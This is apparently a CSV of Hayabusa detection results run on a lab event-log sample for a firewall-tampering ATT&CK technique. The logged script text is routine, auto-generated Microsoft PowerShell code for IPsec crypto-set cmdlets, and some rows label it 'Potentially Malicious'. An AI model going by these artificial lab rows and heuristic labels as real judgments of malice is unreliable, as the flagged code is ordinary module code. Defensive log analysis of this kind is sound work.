$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 